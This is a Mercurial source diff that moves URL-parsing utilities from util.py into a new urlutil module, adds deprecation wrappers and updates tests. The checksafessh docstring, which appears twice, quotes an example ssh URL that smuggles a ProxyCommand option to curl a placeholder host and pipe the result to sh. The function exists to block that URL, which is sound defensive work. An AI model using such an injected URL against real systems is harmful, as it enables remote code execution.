import platform as pyplatform import re as remod import shutil -import socket import stat import sys import time @@ -57,6 +56,7 @@ hashutil, procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -65,7 +65,6 @@ List, Optional, Tuple, - Union, ) @@ -2943,420 +2942,52 @@ return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) -def getport(port): - # type: (Union[bytes, int]) -> int - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. 
- """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise error.Abort( - _(b"no port number associated with service '%s'") % port - ) - - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> - >>> url(b'ssh://[::1]:2200//home/joe/repo') - <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> - >>> url(b'file:///home/joe/repo') - <url scheme: 'file', path: '/home/joe/repo'> - >>> url(b'file:///c:/temp/foo/') - <url scheme: 'file', path: 'c:/temp/foo/'> - >>> url(b'bundle:foo') - <url scheme: 'bundle', path: 'foo'> - >>> url(b'bundle://../foo') - <url scheme: 'bundle', path: '../foo'> - >>> url(br'c:\foo\bar') - <url path: 'c:\\foo\\bar'> - >>> url(br'\\blah\blah\blah') - <url path: '\\\\blah\\blah\\blah'> - >>> url(br'\\blah\blah\blah#baz') - <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> - >>> url(br'file:///C:\users\me') - <url scheme: 'file', path: 'C:\\users\\me'> - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> - >>> url(b'ssh://joe@x/repo') - <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - <url scheme: 'http', host: 'host', path: 'a?b#c'> - - Empty path: - - >>> url(b'') - <url path: ''> - >>> url(b'#a') - <url path: '', fragment: 'a'> - >>> url(b'http://host/') - <url scheme: 'http', host: 'host', path: ''> - >>> url(b'http://host/#a') - <url scheme: 'http', host: 'host', path: '', fragment: 'a'> - - Only scheme: - - >>> url(b'http:') - <url scheme: 'http'> - """ - - _safechars = b"!~*'()+" - _safepchars = b"/!~*'()+:\\" - _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # type: (bytes, bool, bool) -> None - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = 
self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = b'' - self._origpath = path - - if parsefragment and b'#' in path: - path, self.fragment = path.split(b'#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith(b'\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith(b'bundle:'): - self.scheme = b'bundle' - path = path[7:] - if path.startswith(b'//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(b':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = b'' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and b'?' in path: - path, self.query = path.split(b'?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith(b'//'): - parts = path[2:].split(b'/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = b'/' + path - - if self.host and b'@' in self.host: - self.user, self.host = self.host.rsplit(b'@', 1) - if b':' in self.user: - self.user, self.passwd = self.user.split(b':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if ( - self.host - and b':' in self.host - and not ( - self.host.startswith(b'[') and self.host.endswith(b']') - ) - ): - self._hostport = self.host - self.host, self.port = self.host.rsplit(b':', 1) - if not self.host: - self.host = None - - if ( - self.host - and self.scheme == b'file' - and self.host not in 
(b'localhost', b'127.0.0.1', b'[::1]') - ): - raise error.Abort( - _(b'file:// URLs can only refer to localhost') - ) - - self.path = path - - # leave the query string escaped - for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - def copy(self): - u = url(b'temporary useless value') - u.path = self.path - u.scheme = self.scheme - u.user = self.user - u.passwd = self.passwd - u.host = self.host - u.path = self.path - u.query = self.query - u.fragment = self.fragment - u._localpath = self._localpath - u._hostport = self._hostport - u._origpath = self._origpath - return u - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ( - b'scheme', - b'user', - b'passwd', - b'host', - b'port', - b'path', - b'query', - b'fragment', - ): - v = getattr(self, a) - if v is not None: - attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) - return b'' % b', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. 
- - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == b'bundle': - s = b'bundle:' + s - if self.fragment: - s += b'#' + self.fragment - return s - - s = self.scheme + b':' - if self.user or self.passwd or self.host: - s += b'//' - elif self.scheme and ( - not self.path - or self.path.startswith(b'/') - or hasdriveletter(self.path) - ): - s += b'//' - if hasdriveletter(self.path): - s += b'/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += b':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += b'@' - if self.host: - if not (self.host.startswith(b'[') and self.host.endswith(b']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += b':' + urlreq.quote(self.port) - if self.host: - s += b'/' - if self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we 
should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += b'?' + self.query - if self.fragment is not None: - s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), self.user, self.passwd or b'')) - - def isabs(self): - if self.scheme and self.scheme != b'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith(b'/'): - return True # POSIX-style - return False - - def localpath(self): - # type: () -> bytes - if self.scheme == b'file' or self.scheme == b'bundle': - path = self.path or b'/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. 
- if hasdriveletter(self._hostport): - path = self._hostport + b'/' + self.path - elif ( - self.host is not None and self.path and not hasdriveletter(path) - ): - path = b'/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return ( - not self.scheme - or self.scheme == b'file' - or self.scheme == b'bundle' - ) - - -def hasscheme(path): - # type: (bytes) -> bool - return bool(url(path).scheme) # cast to help pytype - - -def hasdriveletter(path): - # type: (bytes) -> bool - return bool(path) and path[1:2] == b':' and path[0:1].isalpha() - - -def urllocalpath(path): - # type: (bytes) -> bytes - return url(path, parsequery=False, parsefragment=False).localpath() - - -def checksafessh(path): - # type: (bytes) -> None - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): - raise error.Abort( - _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) - ) - - -def hidepassword(u): - # type: (bytes) -> bytes - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = b'***' - return bytes(u) - - -def removeauth(u): - # type: (bytes) -> bytes - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return bytes(u) +def getport(*args, **kwargs): + msg = b'getport(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.getport(*args, **kwargs) + + +def url(*args, **kwargs): + msg = b'url(...) 
moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.url(*args, **kwargs) + + +def hasscheme(*args, **kwargs): + msg = b'hasscheme(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasscheme(*args, **kwargs) + + +def hasdriveletter(*args, **kwargs): + msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasdriveletter(*args, **kwargs) + + +def urllocalpath(*args, **kwargs): + msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.urllocalpath(*args, **kwargs) + + +def checksafessh(*args, **kwargs): + msg = b'checksafessh(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.checksafessh(*args, **kwargs) + + +def hidepassword(*args, **kwargs): + msg = b'hidepassword(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hidepassword(*args, **kwargs) + + +def removeauth(*args, **kwargs): + msg = b'removeauth(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.removeauth(*args, **kwargs) timecount = unitcountfn( diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -5,6 +5,8 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. import os +import re as remod +import socket from ..i18n import _ from ..pycompat import ( @@ -12,12 +14,437 @@ setattr, ) from .. import ( + encoding, error, pycompat, - util, + urllibcompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Union, + ) + +urlreq = urllibcompat.urlreq + + +def getport(port): + # type: (Union[bytes, int]) -> int + """Return the port for a given network service. 
+ + If port is an integer, it's returned as is. If it's a string, it's + looked up using socket.getservbyname(). If there's no matching + service, error.Abort is raised. + """ + try: + return int(port) + except ValueError: + pass + + try: + return socket.getservbyname(pycompat.sysstr(port)) + except socket.error: + raise error.Abort( + _(b"no port number associated with service '%s'") % port + ) + + +class url(object): + r"""Reliable URL parser. + + This parses URLs and provides attributes for the following + components: + + ://:@:/?# + + Missing components are set to None. The only exception is + fragment, which is set to '' if present but empty. + + If parsefragment is False, fragment is included in query. If + parsequery is False, query is included in path. If both are + False, both fragment and query are included in path. + + See http://www.ietf.org/rfc/rfc2396.txt for more information. + + Note that for backward compatibility reasons, bundle URLs do not + take host names. That means 'bundle://../' has a path of '../'. 
+ + Examples: + + >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') + + >>> url(b'ssh://[::1]:2200//home/joe/repo') + + >>> url(b'file:///home/joe/repo') + + >>> url(b'file:///c:/temp/foo/') + + >>> url(b'bundle:foo') + + >>> url(b'bundle://../foo') + + >>> url(br'c:\foo\bar') + + >>> url(br'\\blah\blah\blah') + + >>> url(br'\\blah\blah\blah#baz') + + >>> url(br'file:///C:\users\me') + + + Authentication credentials: + + >>> url(b'ssh://joe:xyz@x/repo') + + >>> url(b'ssh://joe@x/repo') + + + Query strings and fragments: + + >>> url(b'http://host/a?b#c') + + >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) + + + Empty path: + + >>> url(b'') + + >>> url(b'#a') + + >>> url(b'http://host/') + + >>> url(b'http://host/#a') + + + Only scheme: + + >>> url(b'http:') + + """ + + _safechars = b"!~*'()+" + _safepchars = b"/!~*'()+:\\" + _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match + + def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None + # We slowly chomp away at path until we have only the path left + self.scheme = self.user = self.passwd = self.host = None + self.port = self.path = self.query = self.fragment = None + self._localpath = True + self._hostport = b'' + self._origpath = path + + if parsefragment and b'#' in path: + path, self.fragment = path.split(b'#', 1) + + # special case for Windows drive letters and UNC paths + if hasdriveletter(path) or path.startswith(b'\\\\'): + self.path = path + return + + # For compatibility reasons, we can't handle bundle paths as + # normal URLS + if path.startswith(b'bundle:'): + self.scheme = b'bundle' + path = path[7:] + if path.startswith(b'//'): + path = path[2:] + self.path = path + return + + if self._matchscheme(path): + parts = path.split(b':', 1) + if parts[0]: + self.scheme, path = parts + self._localpath = False + + if not path: + path = None + if self._localpath: + self.path = b'' + return + else: + if self._localpath: + self.path = path + 
return + + if parsequery and b'?' in path: + path, self.query = path.split(b'?', 1) + if not path: + path = None + if not self.query: + self.query = None + + # // is required to specify a host/authority + if path and path.startswith(b'//'): + parts = path[2:].split(b'/', 1) + if len(parts) > 1: + self.host, path = parts + else: + self.host = parts[0] + path = None + if not self.host: + self.host = None + # path of file:///d is /d + # path of file:///d:/ is d:/, not /d:/ + if path and not hasdriveletter(path): + path = b'/' + path + + if self.host and b'@' in self.host: + self.user, self.host = self.host.rsplit(b'@', 1) + if b':' in self.user: + self.user, self.passwd = self.user.split(b':', 1) + if not self.host: + self.host = None + + # Don't split on colons in IPv6 addresses without ports + if ( + self.host + and b':' in self.host + and not ( + self.host.startswith(b'[') and self.host.endswith(b']') + ) + ): + self._hostport = self.host + self.host, self.port = self.host.rsplit(b':', 1) + if not self.host: + self.host = None + + if ( + self.host + and self.scheme == b'file' + and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') + ): + raise error.Abort( + _(b'file:// URLs can only refer to localhost') + ) + + self.path = path + + # leave the query string escaped + for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): + v = getattr(self, a) + if v is not None: + setattr(self, a, urlreq.unquote(v)) + + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + + @encoding.strmethod + def __repr__(self): + attrs = [] + for a in ( + b'scheme', + b'user', + b'passwd', + b'host', + b'port', + b'path', + b'query', + b'fragment', + ): + v = getattr(self, a) + if v 
is not None: + attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) + return b'' % b', '.join(attrs) + + def __bytes__(self): + r"""Join the URL's components back into a URL string. + + Examples: + + >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) + 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) + 'http://user:pw@host:80/?foo=bar&baz=42' + >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) + 'http://user:pw@host:80/?foo=bar%3dbaz' + >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) + 'ssh://user:pw@[::1]:2200//home/joe#' + >>> bytes(url(b'http://localhost:80//')) + 'http://localhost:80//' + >>> bytes(url(b'http://localhost:80/')) + 'http://localhost:80/' + >>> bytes(url(b'http://localhost:80')) + 'http://localhost:80/' + >>> bytes(url(b'bundle:foo')) + 'bundle:foo' + >>> bytes(url(b'bundle://../foo')) + 'bundle:../foo' + >>> bytes(url(b'path')) + 'path' + >>> bytes(url(b'file:///tmp/foo/bar')) + 'file:///tmp/foo/bar' + >>> bytes(url(b'file:///c:/tmp/foo/bar')) + 'file:///c:/tmp/foo/bar' + >>> print(url(br'bundle:foo\bar')) + bundle:foo\bar + >>> print(url(br'file:///D:\data\hg')) + file:///D:\data\hg + """ + if self._localpath: + s = self.path + if self.scheme == b'bundle': + s = b'bundle:' + s + if self.fragment: + s += b'#' + self.fragment + return s + + s = self.scheme + b':' + if self.user or self.passwd or self.host: + s += b'//' + elif self.scheme and ( + not self.path + or self.path.startswith(b'/') + or hasdriveletter(self.path) + ): + s += b'//' + if hasdriveletter(self.path): + s += b'/' + if self.user: + s += urlreq.quote(self.user, safe=self._safechars) + if self.passwd: + s += b':' + urlreq.quote(self.passwd, safe=self._safechars) + if self.user or self.passwd: + s += b'@' + if self.host: + if not (self.host.startswith(b'[') and self.host.endswith(b']')): + s += urlreq.quote(self.host) + else: + s += self.host + if self.port: + s += b':' + urlreq.quote(self.port) + if 
self.host: + s += b'/' + if self.path: + # TODO: similar to the query string, we should not unescape the + # path when we store it, the path might contain '%2f' = '/', + # which we should *not* escape. + s += urlreq.quote(self.path, safe=self._safepchars) + if self.query: + # we store the query in escaped form. + s += b'?' + self.query + if self.fragment is not None: + s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) + return s + + __str__ = encoding.strmethod(__bytes__) + + def authinfo(self): + user, passwd = self.user, self.passwd + try: + self.user, self.passwd = None, None + s = bytes(self) + finally: + self.user, self.passwd = user, passwd + if not self.user: + return (s, None) + # authinfo[1] is passed to urllib2 password manager, and its + # URIs must not contain credentials. The host is passed in the + # URIs list because Python < 2.4.3 uses only that to search for + # a password. + return (s, (None, (s, self.host), self.user, self.passwd or b'')) + + def isabs(self): + if self.scheme and self.scheme != b'file': + return True # remote URL + if hasdriveletter(self.path): + return True # absolute for our purposes - can't be joined() + if self.path.startswith(br'\\'): + return True # Windows UNC path + if self.path.startswith(b'/'): + return True # POSIX-style + return False + + def localpath(self): + # type: () -> bytes + if self.scheme == b'file' or self.scheme == b'bundle': + path = self.path or b'/' + # For Windows, we need to promote hosts containing drive + # letters to paths with drive letters. 
+ if hasdriveletter(self._hostport): + path = self._hostport + b'/' + self.path + elif ( + self.host is not None and self.path and not hasdriveletter(path) + ): + path = b'/' + path + return path + return self._origpath + + def islocal(self): + '''whether localpath will return something that posixfile can open''' + return ( + not self.scheme + or self.scheme == b'file' + or self.scheme == b'bundle' + ) + + +def hasscheme(path): + # type: (bytes) -> bool + return bool(url(path).scheme) # cast to help pytype + + +def hasdriveletter(path): + # type: (bytes) -> bool + return bool(path) and path[1:2] == b':' and path[0:1].isalpha() + + +def urllocalpath(path): + # type: (bytes) -> bytes + return url(path, parsequery=False, parsefragment=False).localpath() + + +def checksafessh(path): + # type: (bytes) -> None + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = urlreq.unquote(path) + if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): + raise error.Abort( + _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) + ) + + +def hidepassword(u): + # type: (bytes) -> bytes + '''hide user credential in a url string''' + u = url(u) + if u.passwd: + u.passwd = b'***' + return bytes(u) + + +def removeauth(u): + # type: (bytes) -> bytes + '''remove all authentication information from a url string''' + u = url(u) + u.user = u.passwd = None + return bytes(u) + + class paths(dict): """Represents a collection of paths and their configs. @@ -103,7 +530,7 @@ @pathsuboption(b'pushurl', b'pushloc') def pushurlpathoption(ui, path, value): - u = util.url(value) + u = url(value) # Actually require a URL. 
if not u.scheme: ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) @@ -148,7 +575,7 @@ raise ValueError(b'rawloc must be defined') # Locations may define branches via syntax #. - u = util.url(rawloc) + u = url(rawloc) branch = None if u.fragment: branch = u.fragment diff --git a/tests/test-doctest.py b/tests/test-doctest.py --- a/tests/test-doctest.py +++ b/tests/test-doctest.py @@ -158,6 +158,7 @@ ('mercurial.util', '{}'), ('mercurial.utils.dateutil', '{}'), ('mercurial.utils.stringutil', '{}'), + ('mercurial.utils.urlutil', '{}'), ('tests.drawdag', '{}'), ('tests.test-run-tests', '{}'), ('tests.test-url', "{'optionflags': 4}"), diff --git a/tests/test-hgweb-auth.py b/tests/test-hgweb-auth.py --- a/tests/test-hgweb-auth.py +++ b/tests/test-hgweb-auth.py @@ -10,7 +10,10 @@ url, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -60,7 +63,7 @@ print('URI:', pycompat.strurl(uri)) try: pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm()) - u, authinfo = util.url(uri).authinfo() + u, authinfo = urlutil.url(uri).authinfo() if authinfo is not None: pm.add_password(*_stringifyauthinfo(authinfo)) print( @@ -198,10 +201,12 @@ def testauthinfo(fullurl, authurl): print('URIs:', fullurl, authurl) pm = urlreq.httppasswordmgrwithdefaultrealm() - ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1]) + ai = _stringifyauthinfo( + urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1] + ) pm.add_password(*ai) print(pm.find_user_password('test', authurl)) -print('\n*** Test urllib2 and util.url\n') +print('\n*** Test urllib2 and urlutil.url\n') testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo') diff --git a/tests/test-hgweb-auth.py.out b/tests/test-hgweb-auth.py.out --- a/tests/test-hgweb-auth.py.out +++ b/tests/test-hgweb-auth.py.out @@ -211,7 +211,7 @@ URI: http://example.org/foo abort -*** Test 
urllib2 and util.url +*** Test urllib2 and urlutil.url URIs: http://user@example.com:8080/foo http://example.com:8080/foo ('user', '') diff --git a/tests/test-url.py b/tests/test-url.py --- a/tests/test-url.py +++ b/tests/test-url.py @@ -275,7 +275,7 @@ def test_url(): """ >>> from mercurial import error, pycompat - >>> from mercurial.util import url + >>> from mercurial.utils.urlutil import url >>> from mercurial.utils.stringutil import forcebytestr This tests for edge cases in url.URL's parsing algorithm. Most of